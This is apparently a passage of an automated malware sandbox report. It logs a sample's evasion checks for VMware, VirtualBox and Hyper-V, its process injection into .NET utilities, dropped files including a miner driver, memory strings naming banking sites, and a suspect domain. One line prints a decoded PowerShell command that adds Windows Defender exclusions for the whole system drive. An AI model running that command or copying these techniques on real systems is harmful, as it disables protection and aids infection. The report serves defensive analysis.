                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4556, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599888
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599671
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599343
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599234
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599119
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599015
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598906
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598796
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598685
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598577
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598468
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598359
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1184
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1802
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5823
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3942
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\ProgramData\Dllhost\WinRing0x64.sysJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDropped PE file which has not been started: C:\ProgramData\Dllhost\winlogson.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\main\7z.dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 7320Thread sleep time: -270000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 7300Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 4884Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 7556Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe TID: 3528Thread sleep time: -40000s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6700Thread sleep count: 5823 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6700Thread sleep count: 3942 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6628Thread sleep time: -5534023222112862s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
                Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeThread delayed: delay time: 40000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599888
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599671
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 30000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599343
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599234
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599119
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599015
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598906
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598796
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598685
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598577
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598468
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598359
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\Jump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\extractedJump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
                Source: aspnet_regiis.exe, 00000008.00000003.1589823693.0000000004D8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                Source: aspnet_regiis.exe, 00000008.00000003.1589823693.0000000004D8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696501413o
                Source: RegSvcs.exe, 00000021.00000002.1975416877.0000000000162000.00000020.00000400.00020000.00000000.sdmpBinary or memory string: Vmwaretrat
                Source: aspnet_regiis.exe, 00000008.00000003.1589823693.0000000004D8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                Source: aspnet_regiis.exe, 00000007.00000003.1685568378.00000000062B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 9VmCICf6YMo
                Source: Installer.exe, 0000001F.00000002.1912432871.0000000001524000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
                Source: RegSvcs.exe, 00000021.00000002.1975416877.0000000000162000.00000020.00000400.00020000.00000000.sdmpBinary or memory string: vboxservice
                Source: aspnet_regiis.exe, 00000008.00000003.1589823693.0000000004D8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
                Source: aspnet_regiis.exe, 00000007.00000003.1721547580.0000000002E5E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000002.1804352818.0000000002E5E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1685994655.0000000002E5E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1692490645.0000000002E5E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499365497.0000000002E5E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499199298.0000000002E5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW{
                Source: aspnet_regiis.exe, 00000008.00000003.1589823693.0000000004D8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                Source: aspnet_regiis.exe, 00000008.00000003.1589823693.0000000004D8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696501413j
                Source: aspnet_regiis.exe, 00000008.00000003.1589823693.0000000004D8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
                Source: aspnet_regiis.exe, 0000000A.00000003.1507136747.000000000294B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 0000000A.00000002.1507875244.000000000294B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW1
                Source: aspnet_regiis.exe, 00000008.00000003.1589823693.0000000004D8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                Source: aspnet_regiis.exe, 00000007.00000003.1721547580.0000000002E5E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000002.1804039273.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000002.1804352818.0000000002E5E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1685994655.0000000002E5E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1692490645.0000000002E5E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499365497.0000000002E5E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1499199298.0000000002E5E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1529819200.00000000028DA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000002.1815812441.00000000028D5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1499115102.00000000028D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: aspnet_regiis.exe, 00000008.00000003.1589823693.0000000004D8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                Source: aspnet_regiis.exe, 00000008.00000003.1589823693.0000000004D8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696501413x
                Source: aspnet_regiis.exe, 00000008.00000003.1589823693.0000000004D8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
                Source: RegSvcs.exe, 00000021.00000002.1975416877.0000000000162000.00000020.00000400.00020000.00000000.sdmpBinary or memory string: Vmwareuser
                Source: aspnet_regiis.exe, 00000008.00000003.1589823693.0000000004D8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                Source: aspnet_regiis.exe, 00000008.00000003.1589823693.0000000004D8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
                Source: aspnet_regiis.exe, 00000008.00000003.1589823693.0000000004D8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696501413t
                Source: aspnet_regiis.exe, 00000008.00000003.1589823693.0000000004D8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - HKVMware20,11696501413]
                Source: RegSvcs.exe, 00000021.00000002.1983989307.0000000005760000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlld
                Source: aspnet_regiis.exe, 00000008.00000003.1589823693.0000000004D8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696501413s
                Source: aspnet_regiis.exe, 00000008.00000003.1589823693.0000000004D8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                Source: aspnet_regiis.exe, 00000008.00000003.1589672131.0000000004D9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696501413p
                Source: Installer.exe, 0000001F.00000003.1911606437.0000000003B22000.00000040.00001000.00020000.00000000.sdmp, Installer.exe, 0000001F.00000002.1911910899.000000000038C000.00000004.00000001.01000000.0000000A.sdmp, RegSvcs.exe, 00000021.00000002.1979634479.0000000002351000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000021.00000002.1975416877.0000000000162000.00000020.00000400.00020000.00000000.sdmpBinary or memory string: vboxtray
                Source: Installer.exe, 0000001F.00000002.1912432871.000000000155C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: aspnet_regiis.exe, 00000008.00000003.1589823693.0000000004D8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
                Source: Installer.exe, 0000001F.00000002.1912432871.0000000001577000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                Source: aspnet_regiis.exe, 00000008.00000003.1589823693.0000000004D8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                Source: aspnet_regiis.exe, 00000008.00000003.1589823693.0000000004D8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
                Source: RegSvcs.exe, 00000021.00000002.1975416877.0000000000162000.00000020.00000400.00020000.00000000.sdmpBinary or memory string: Vmtoolsd
                Source: aspnet_regiis.exe, 00000008.00000003.1589823693.0000000004D8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696501413
                Source: aspnet_regiis.exe, 00000008.00000003.1589823693.0000000004D8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                Source: aspnet_regiis.exe, 00000008.00000003.1589823693.0000000004D8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
                Source: aspnet_regiis.exe, 00000008.00000003.1589823693.0000000004D8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
                Source: aspnet_regiis.exe, 00000008.00000003.1589823693.0000000004D8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
                Source: aspnet_regiis.exe, 00000008.00000003.1589823693.0000000004D8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696501413
                Source: aspnet_regiis.exe, 00000008.00000003.1589823693.0000000004D8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696501413t
                Source: aspnet_regiis.exe, 00000008.00000003.1589823693.0000000004D8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                Source: aspnet_regiis.exe, 00000008.00000003.1589823693.0000000004D8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.comVMware20,11696501413
                Source: aspnet_regiis.exe, 00000008.00000003.1589823693.0000000004D8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696501413f
                Source: aspnet_regiis.exe, 00000008.00000003.1589823693.0000000004D8F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696501413
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_77098A80 LdrInitializeThunk,8_2_77098A80
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 77060000 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 77060000 protect: page execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 77060000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 160000 protect: page execute and read and write
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: Base64 decoded <#GJiR#> Add-MpPreference <#Nb#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#pvjvYWmOL#> -Force <#6NZ08jpHvn#>
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: Base64 decoded <#GJiR#> Add-MpPreference <#Nb#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#pvjvYWmOL#> -Force <#6NZ08jpHvn#>
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 77060000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 77060000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 77060000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 160000 value starts with: 4D5A
                Source: aspnet_regiis.exe, 00000007.00000002.1806840500.000000007709E000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: tamedgeesy.sbs
